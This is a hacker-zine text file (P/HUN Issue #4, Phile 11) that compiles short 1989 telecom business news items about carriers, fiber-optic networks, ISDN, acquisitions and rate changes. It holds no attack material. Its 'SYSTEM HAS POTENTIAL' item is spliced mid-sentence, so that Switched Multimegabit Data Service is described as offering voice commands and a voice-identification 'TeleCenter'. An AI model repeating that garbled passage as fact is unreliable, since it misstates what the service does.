CALLERS WILL GET MORE RIGHTS:

The FCC said yesterday that alternative long-distance operators

must: Put a sticker on the phone with price information or tell

the caller the price verbally; give callers an chance to hang up

without any charge; offer callers a chance to go through AT&T or

another phone service. Right now many alternative operators stop

you from using another carrier.



NISSEI PLANS A FAX EXPANSION:

Portable facsimile machine manufacturer Nissei says that a

major expansion of its operations will be completed within 2

months. To come: As many as 5 new fax machines, a revamping of the

field staff to cover all sales territories. Also: Vice President

John Haggerty says Nissei will move into other areas of the retail

information technology market.



BELL GOES TO COLLEGE:

Bell Atlanticom Systems said yesterday it has signed a contract

with the College of William and Mary in Williamsburg, Va., for a

fully integrated voice and data communications system. The

campus-wide system will provide resale of communications services

to students, a management system, and a universal wiring plan to

provide voice and data transmission.



SYSTEM INCLUDES TRUNKS, LINES:

The communications system obtained by the College of William

and Mary yesterday will provide 300 trunks, 3,800 faculty and

student lines, 150 voice/data faculty users and 1,050 host data

ports. It includes more than 5,000 inside wiring runs and several

miles of fiber optics. Also included: A 1,000-user Aspen Voice

Mail System and the Alex-IS Telecommunications Management System.



MESSAGES GO AROUND THE GLOBE:

GE Information Services has announced a new capability of its

QUIK-COMM System (electronic mailbox service) which enables users

to send QUIK-COMM messages to facsimile machines throughout the

world. Receiving fax machines must be Group III facsimile

terminals that conform to CCITT standards. Recipients do not have

to be QUIK-COMM System subscribers to receive the fax document.



MCI GETS THE INSURANCE:

Northwestern Mutual Life Insurance Co. said yesterday it has

selected MCI Communications to replace AT&T's data network with a

nationwide data communications network linking Northwestern

Mutual's Milwaukee-based home office with its remote general and

district agency offices. The 3-year, multimillion dollar agreement

will eventually link more than 200 agency offices.



BELLSOUTH GETS CLOSER TO EUROPE:

BellSouth Corp. has signed a definitive agreement to purchase

Air Call Holdings' shares in Air Call Communications, providers of

cellular, paging and telephone answering and telemarketing

services in the United Kingdom, Ireland and continental Europe.

BellSouth provides mobile systems services in the USA, Argentina,

Australia, Ireland and Europe.



SYSTEM OFFERS NEW OPTIONS:

New networking and programming capabilities for the McDonnell

Douglas REALITY Operating System are being scheduled for beta

testing at several customer sites, the company said yesterday.

Dubbed ROS 7.0, the system will offer capabilities previously

unavailable in PICK systems. Also: Data and processing can be

distributed transparent to users and, in cases, the programmer.

-------------------------------------------------------------------------------



P/HUN Issue #4, Volume 2: Phile 11 of 11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  


__________________________________

| |

| P/HUN Telecom News/Advancements |

| PART 2 |

| By DareDevil |

|_________________________________|









March 3-5, 1989

PHONE LINES ARE SIMILAR:

The USA's major long distance phone services aren't that

different. A comparison of AT&T, MCI Communications Co. and Sprint

Communications Co. in the March Data Communications magazine

found, for instance: Calls placed over Sprint lines were slightly

louder than those placed over AT&T or MCI lines. All the calls,

however, could be heard clearly. (From the USA TODAY Money

section.)



SPRINT WAS MOST ACCURATE:

A study by Data Communications magazine says AT&T connected its

calls more quickly than other carriers. On average, it took 9.8

seconds to connect an AT&T call; 12.9 seconds for Sprint; 13.7

seconds for MCI. Also: Sprint had the ferest foulups. Only 2.3% of

the calls on its lines failed to go through on the first try; 4.9%

for AT&T; and 7.3% for MCI.



CRITICAL FIRMS CALL SURVEY FAIR:

When information was sent from one computer to another over

phone lines during a study by Data Communications magazine, AT&T

had the fewest glitches. Next best: Sprint, then MCI. The magazine

placed 150-180 calls over the trio's phone lines between 4 cities

last fall. Companies response: All had criticisms of the

comparison but, overall, said results appeared to be fair.



PHONE FIRM ELIMINATES CHEMICAL:

AT&T says it's saving the ozone layer. The company says it has

developed a way to eliminate the chemical CFC-113 from a process

it uses to make electronic circuit boards. Scientists say the

chemical may damage the ozone layer of the earth's atmosphere,

which protects people from dangerous ultraviolet rays from the

sun. (From the USA TODAY Money section.)



SERVICE STOPPED IN CANADA:

Bell Canada has decided to end its 976 phone service in all of

its service regions, Telecommunications magazine says. The firm

said significant increases in cost and an anticipated decline in

revenues as primary factors in making the decision. Bell Canada is

the nation's largest telecommunications operating company.



MCI FAX HAS SEVERAL FEATURES:

MCI has moved fast on fax. Telecommunications magazine reports

that MCI has become the first long-distance company in the USA to

offer a dedicated network for domestic and international fax

transmissions. Called MCI FAX, the service will include management

information reports, customized dialing plans, credit card billing

and other features.



-------------------------------------------------------------------------------

March 8, 1989

PACBELL TRUNK FEES SHOOT HIGHER:

Costs on Pacific Bell's Assured PBX Trunk Line Service have

jumped nearly 50%, according to Network World. The increase was

made after the California Public Utilities Commission approved a

PacBell plan to create a new trunk service and raise rates for

what was once the only grade of service available. One firm with

2,000 trunks will pay about $96,000 more per year.



BELL PUTS FIBER INTO LAUNCH:

Southern Bell and Bell Communications Research engineers are

working with NASA to prepare for a high definition TV taping and

transmission of the launch of the space shuttle Discovery.

Broadcasting magazine says Southern Bell and Bellcore are handling

a live fiber-optic transmission of the launch. A temporary studio

has been built at Kennedy Space Center.



RATES WILL DROP IN ALABAMA:

The Alabama State Public Service Commission said in Montgomery

yesterday that phone rates will soon drop in the state. Ordered:

South Central Bell must reduce rates by $9 million by April. Cuts:

25 cents off the monthly Touch-Tone service; the elimination of

the Touch-Tone installation fee.



SATELLITE FLIES FOR JAPAN:

The next launch of Arianespace is scheduled for the end of

March. Using the ELA 1 launch complex, an Ariane 2 launch vehicle

will place into orbit the Swedish direct broadcasting and

communications satellite TELE-X. The group last Saturday launched

the first Japanese telecommunications satellite JCSAT 1 and the

first European meteorological satellite MOP 1.



OPTIONS ADDED TO VOICE LINE:

VoiceCom Systems has added 3 new service options to its voice

messaging product line, extended its worldwide communications

network, and created a new business unit to develop and implement

custom voice response applications. VoiceCom also introduced Guest

Mailbox service, which allows VoiceCom customers to temporarily

assign special voice mailboxes to their customers and vendors.



MODEMS ARE SLEEK, SOPHISTICATED:

Some modems are being marketed like sleek sports cars. General

DataComm Industries is touting 2 new leased-line modems for

9,600-bit-per-second data communications as "the perfect balance

of technology and style," CommunicationsWeek says. Also: The

company says they include "sophisticated features" in "small,

stylish enclosures."



RADIO TELESCOPES LOOK IN SPACE:

112-foot-diameter and 210-foot-diameter radio telescopes in

NASA's Deep Space Network will be used in the search for

extraterrestrial intelligence in space. Located in the Mojave

Desert and Australia, the telescopes will survey the universe over

a wide radio frequency range and spot-check bands up to 25,000

megahertz for some signal that indicates intelligence.



RADIO WILL SEARCH SILENT VALLEY:

NASA's radio network searching for intelligence in space will

cover at least 10,000 times more frequencies than all previous

surveys and be 300 times more sensitive. The search will hunt for

signals from stars similar to Earth's sun, up to 80 light years

from Earth. Of particular interest: The region from about 1,000

megahertz to 60,000 megahertz, the silent valley of frequencies.



PHONE WILL KEEP HER IN TOUCH:

A telephone and computer electronic mail service will keep

Abigale K. Alling in touch with the world when she begins a 5-day

experiment today in the Arizona desert. She will enter a

20-foot-high, 23-foot-square test module through an air lock and

sever the umbilical cord with Earth. She will be cut off from

everything except sunlight and communication links with the

outside world.



-------------------------------------------------------------------------------

March 9, 1989

AT&T MAKES LINK, CHIP FOR JAPAN:

AT&T announced 2 products yesterday for Japan: A high-speed,

fiber optic data link and an Integrated Services Digital Network

(ISDN) microchip. The microchip can work with a variety of

microprocessors and other ISDN chips. It will more easily allow

Japanese telephone users to have access to a digital network that

can provide data, voice, and image transmission on one phone line.



LINK WILL HAVE LAN, VIDEO USES:

AT&T is developing the ODL 125-FC Lightwave Data Link to comply

with Japan's industry standard for fiber-optic connectors, AT&T

said yesterday. Comprised of a receiver and transmitter, it

converts electrical signals to optical signals for fiber optic

data transmission. Applications include fiber-optic,

token-passing-ring Local Area Networks, and transmission of

digitized video signals.



NEW WATS JOINS THE MARKET:

Advanced Telecommunications has announced a new long distance

service, Standard PLUS WATS, designed for small business

customers. Standard PLUS WATS will benefit the business caller

whose monthly long distance bill exceeds $150, the company said.

Standard PLUS features volume discounts up to 21%, 6-second

incremental billing and free call detail.



CARRIER GROUP GIVES SUPPORT:

The Signaling System 7 from CCITT has won the support of the

National Telecommunications Network. SS7 would let NTN provide

Integrated Services Digital Network services, calling card

services and advanced toll-free services, reports Network World.

The 18,000-route mile network has customers in 175 cities.



HUGHES OBTAINING NETWORK FIRM:

Sytek Inc., a producer of local network equipment, is being

bought by Hughes Aircraft for an estimated $50 million, Network

World reports. The deal still needs SEC approval. Sytek products

include broadband, fiber-optic and twisted-pair versions of

Ethernet and token-ring networks. The acquisition has been

discussed for months.



TULSA METROLINK TO BE BOUGHT:

Dallas-based Columbine Telenet has entered an agreement to

purchase Tulsa MetroLink from Public Service Co. of Oklahoma,

officials said yesterday. Tulsa MetroLink is a 110 mile digital

fiber optic communications system founded in 1984 by PSO to

provide for high speed data and voice transmission to meet

internal communications needs.



TULSA FIRM HAS LONGEST FIBER:

Tulsa Metrolink, which is being purchased by Columbine Telenet,

includes the longest single span of fiber in the USA - 1,944 feet

across the Arkansas River. The network can carry more than 400

million bits of data each second and can handle 6,000 simultaneous

voice conversations. Laser beams translate data or voice signals

into on-off lights sent through glass fibers finer than human

hair.



CXR LINE TO CROSS INTO KOREA:

CXR Telcom, worldwide supplier of systems for the

communications markets, has signed a 3-year licensing agreement

with Woojin Electronics and Telecommunications Ltd., of Seoul,

South Korea. Under the agreement, subject to Korean government

approval, Woojin will sell CXR's subscriber line test module to

the Korean authority for use in its new line of digital switches.



-------------------------------------------------------------------------------

March 10-12, 1989

SPRINT SIGNS ATLANTIC DEAL:

Cable & Wireless and US Sprint Thursday announced that US

Sprint will acquire the USA end of the PTAT transatlantic

fiber-optic cable system. Also: The 2 companies have formed an

alliance to jointly develop advanced global telecommunication

services. PTAT is the first privately built transatlantic

fiber-optic cable. It will link the USA and Britain. (From the USA

TODAY Money section.)



SPRINT GETS HALF INTEREST:

The alliance between US Sprint and Cable & Wireless will be

named GLOBAL FON. Also: US Sprint has agreed to acquire the

complete interest of the Washington-based Private Transatlantic

Telecommunications Systems in the PTAT transatlantic cable system.

The acquisition, which is subject to FCC approval, will give US

Sprint a 50% interest in PTAT along with Cable and Wireless.



NEW SERVICE OFFERS IVPN:

Among the first services to be jointly developed by GLOBAL FON

by Cable & Wireless and US Sprint will be an international virtual

private network (IVPN) based on Sprint's VPN and a GLOBAL FONCARD

based on Sprint's travel service, the FONCARD. The alliance will

also develop international private line services offering

customers a variety of enhanced features and capabilities.



ARTEL SYSTEM TO SELL IN JAPAN:

NKK Corp., one of Japan's largest industrial concerns with

annual revenues of $8 billion, will be licensed to manufacture and

sell Artel Communication's 100 Mbps fiber optic local area network

system, FiberWay, in Japan, the companies said Thursday. Also: NKK

becomes the authorized distributor for Artel's fiber optic video

and graphics transmission system products.



FLORIDA SITE PLUGGED INTO FIBER:

The latest development in fiber optic technology is bringing

fiber to the home, Southern Bell says. Heathrow, a mixed use

development north of Orlando, Fla., is on the leading edge of

fiber-to-the-home efforts. At Heathrow, residents will receive

voice, data and video over the same fiber system. The system

points to the day when optical fiber will be possible over all

telephones.



AREA SET FOR VOICE-ONLY FIBER:

The first widespread appearance of optical fiber to the home

will be traditional voice lines, Southern Bell says. The company

will begin using fiber for voice-only delivery later this year in

Governor's Island, north of Charlotte, N.C., and several other

locations. Studies show that fiber systems to carry voice to the

home will be more economical than copper by the early 1990s.



FIBER IS GOING SINGLE-MODE:

Southern Bell uses fiber systems that operate at up to 1.2

billion digital bits a second on a single fiber (the equivalent of

more than 16,000 simultaneous voice conversations), the firm says.

Since 1985, most of the optical fiber placed in Southern Bell has

been single-mode, which has a thinner core than its multi-mode

counterpart, keeping lightwaves traveling in a straight path.



CHEVRON CHOOSES TELECOM SUPPLIER:

Chevron Information Technology Co. (CITC) has selected Northern

Telecom as its sole supplier of telecommunications equipment,

company officials said Thursday. The $8.4 million dollar agreement

was reached in association with PacTel Meridian Systems, which

will provide the equipment and services to Chevron. Most of the

PBXs will be located in California, Louisiana and Texas.



SOFTWARE PROCESSES AND MONITORS:

IBM has introduced 2 products to help customers better manage

and use telecommunications facilities. At $90,000, Network Call

Accounting can process call detail records from multiple voice

switches. Expenses can be charged to a department or an extension.

Voice Network Design is a software program that lets customers

monitor the cost-effectiveness of transmission facilities.



-------------------------------------------------------------------------------

March 15, 1989



SEARS STICKS WITH SPRINT:

US Sprint has signed a multi-million dollar communications

services agreement with Sears Technology Services Inc., the

corporate information organization of Sears, Roebuck and Co. The

agreement extends and enhances an agreement previously reached

between Sears and US Sprint in 1986 and makes STS one of US

Sprint's largest users.



20,000 SEARS SITES COVERED:

A new agreement with Sears Technology Services will make US

Sprint the primary carrier of interLATA long-distance services for

Sears. Specific terms of the contract were not disclosed. However,

officials of both companies said US Sprint would link

approximately 20,000 Sears locations throughout the country. Most

US Sprint products and services are covered under the agreement.



DIGITAL SWITCHES GO TO CHINA:

Ericsson has signed a general agreement with China for AXE

digital switching equipment expected to lead to contracts worth

$31 million in the first stage. The agreement was signed by

Ericsson Australia with the Ningbo Post and Telecommunications

Bureau and the Ningbo Telephone Co. Ericsson will supply 12

digital AXE switches, including local subscriber and trunk lines,

to Ningbo.



TELEPHONE AND TERMINAL LINKED:

Digital Equipment and Northern Telecom yesterday unveiled new

communications capabilities to integrate voice and data

information resources at the desk top, linking the telephone and

the terminal as a single tool. Featured: When a customer

assistance representative answers the phone, pertinent information

concerning the caller can be automatically displayed on the

terminal.



ELECTRICAL PROBLEM FOUND:

A potential electrical glitch on the shuttle Discovery poses no

danger to the crew but may force it to return a day early. The

crew successfully launched a a $100 million Tracking and Data

Relay Satellite into orbit Monday. The problem: High pressure in

one of 3 fuel cells - used to produce electricity. NASA decides

tomorrow when to end the mission. (From the USA TODAY News

section.)



CALLS MADE ON THE COMPUTER:

An integrated message desk capability that automatically links

message taking to electronic mail or voice store and forward mail

is included in a new communications system from Digital Equipment

and Northern Telecom. Also included: Computer screen dialing that

enables a user to key in the name of the party to be called. It

can be used for office communications, telemarketing and other

calls.



BELLATRIX JOINS THE FIELD:

Bellatrix Corp., a publicly owned company, said yesterday it

will enter the field of telecommunications through its wholly

owned subsidiary, Bellatrix Communications Inc. It will offer

turnkey 900 interactive data and information services, including

connection and termination. Bellatrix expects the services to be

operational in May.



CHINA GETS 8,000 NEW LINES:

Northern Telecom put into service yesterday its first DMS-100

digital switching system in the People's Republic of China. The

system will provide 8,000 lines of telecommunications service to 3

cities in Jiangxi province, about 900 miles south of Beijing.

Features such as direct dial services will now be available to

local subscribers.



LARGEST SYSTEM SERVES PINGXIANG:

The main Northern Telecom system that opened yesterday in China

consists of 6,000 telephone lines for subscribers in Pingxiang.

The Pingxiang system is part of a $6 million contract announced in

1987 through which Northern Telecom will supply its DMS-100 and

DMS-10, with a capacity of 10,000 lines, to the Jiangxi PTA for

telecommunications services in 4 Chinese cities.



PACTEL HEAD MADE A DIRECTOR:

Sam Ginn, chairman and chief executive officer of Pacific

Telesis Group, has been elected a director of Transamerica Corp.,

it was announced yesterday. Ginn, 51, has been chairman and chief

executive officer of Pacific Telesis since April 1988. Previously

he held the position of president and chief operating officer.

Ginn began his business career in 1960 with AT&T.



-------------------------------------------------------------------------------

March 17-19, 1989



YELLOW PAGES ARE FOR NIGHT OWLS:

Pacific Bell assembled a separate yellow page section of

businesses open after 6 p.m. The first one, due out this month in

San Jose, Calif., has 199 listings - everything from 24-hour

salons to an all-night notary public. Officials say this is a

first-of-its-kind listing to be included in telephone books in 29

California communities by May 1990.



-------------------------------------------------------------------------------

March 21, 1989



CORDLESS PHONES CALL POLICE:

Some Cleveland, Ohio, residents with cordless phones are

alarmed to find police at their doors asking, "What's the

problem?" The problem: Cordless phones with weak batteries send

out pulses that sometimes automatically dial the emergency number

911. (From the USA TODAY News section.)



ALLTEL CLAIMS STAKE IN CELLULAR:

ALLTEL Mobile Communications said yesterday that it has

completed its purchase of Kansas Cellular Telephone Co.'s 40%

interest in the Wichita, Kan., wireline cellular system. ALLTEL

Mobile will be a limited partner in the Wichita SMSA partnership.

Southwestern Bell Mobile Systems is the general partner and

operator of the system.



DIGITAL SYSTEM GOES VIA SW BELL:

Southwestern Bell Telecom will distribute Northern Telecom's

Meridian Norstar digital key system, company officials announced

yesterday. Southwestern Bell Telecom will market the Meridian

Norstar in Missouri, Kansas, Oklahoma, Arkansas and Texas.

Meridian Norstar is a small business communications system which

offers voice and data communications capabilities.



GTE AWARDS RADIO CONTRACT:

Ericsson Radar Electronics of Sweden has received a $55 million

contract from GTE Government Systems Corp. to deliver mobile

microwave radios to the corporation's Mobile Subscriber Equipment

Division in Taunton, Mass. Designated MF15, the 15 GHz

down-the-hill radios have a transmission capacity of 256 - 4096

kbit/s. They were developed by Ericsson and Marconi Italiana.



EXCHANGE TO CARRY ISDN CIRCUIT:

Network Equipment Technologies Inc. said yesterday that its

Integrated Digital Network Exchange has become the first product

of its kind to be certified to carry an ISDN primary rate circuit

(23B plus D) between 2 Northern Telecom Meridian SL-1 private

branch exchanges. The announcement came after successful testing

conducted recently by Northern Telecom at its facility in Santa

Clara, Calif.



COMSAT TO DEVELOP NETWORK:

COMSAT Corp.'s Systems Division has been awarded a $16.9

million contract by the Turkish Postal Telephone and Telegraph

agency to modernize U.S. military communications in the

Mediterranean area. Designed and funded by the U.S. Defense

Communications Agency, the 5-year program calls for COMSAT to

perform systems engineering and integration for a new digital

wideband satellite-based network.



SYSTEM TO REPLACE TURKEY SITES:

A new COMSAT system known as "DMIP I" (DCA Mediterranean

Improvement Program Phase I) is the first of a series designed to

improve Mediterranean area U.S. military communications over the

next several years. Each of DMIP I's 6 Earth stations, located at

major U.S. defense installations throughout Turkey, will

eventually replace the antiquated troposcatter sites.



RURAL WISCONSIN WILL GET TDS:

Telephone and Data Systems Inc. says that as a result of FCC

lotteries held this week it expects to have an interest in

cellular systems serving 2 Rural Service Areas in Wisconsin. The

systems will serve southwestern and central Wisconsin and the

major state highways to the west and southwest of Madison, Wis.



FIBER OPTICS HAVE MILITARY USE:

The Communications Product Division of Microwave Modules and

Devices and Codenoll Technology have announced an agreement to

offer rugged and militarized versions of Codenoll's fiber optic

Ethernet Local Area Network products for military/federal Tempest

applications. It gives the firms rights to use and modify

Codenoll's designs according to military standards.



-------------------------------------------------------------------------------

March 31-April 2, 1989



LINES ARE PICTURE PERFECT:

Telephone lines are being used to send images from electronic

still cameras to newspapers and companies. The camera captures

images on a tiny computer disk instead of film. A transmitter

sends the image over phone lines in 3 1/2 minutes or less. Once

received, the image can be stored on a disk or printed on paper.

(From the USA TODAY Money section.)



FRENCH LINE GOES SILENT:

In operation only 3 months, the TAT-8 trans-Atlantic fiber

optic system reaching into France needed to be closed down last

week for repairs. Suspected cause: Trawling lines in the Atlantic.

During the restoration, the International Telecommunications

Satellite Organization carries the international traffic. TAT-8 is

owned by AT&T, France Telecom and British Telecom.



NYNEX SUPPORTS HIGH-SPEED DATA:

NYNEX said Thursday that it supports proposed generic

requirements for a new high-speed data communications service.

Known as Switched Multimegabit Data Service, the system is

scheduled to be available as early as 1991. SMDS will interconnect

local area networks (LANs) by providing broadband transport across

a metropolitan area using public, packet-switched networks.



SYSTEM HAS POTENTIAL:

Designed to make use of evolving metropolitan-area network

standards and technology, the new Switched Multimegabit Data

Service will provide customer voice commands or touchtone signals.



When a user calls the TeleCenter, he or she is prompted to give a name and

password. A voice entry feature searches its "user profile" records for a

voice pattern matching that of the caller.



If the caller is identified as an authorized user, the caller's stored

templates are loaded, allowing the user to communicate with the voice mail

system entirely by voice.



-------------------------------------------------------------------------------

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT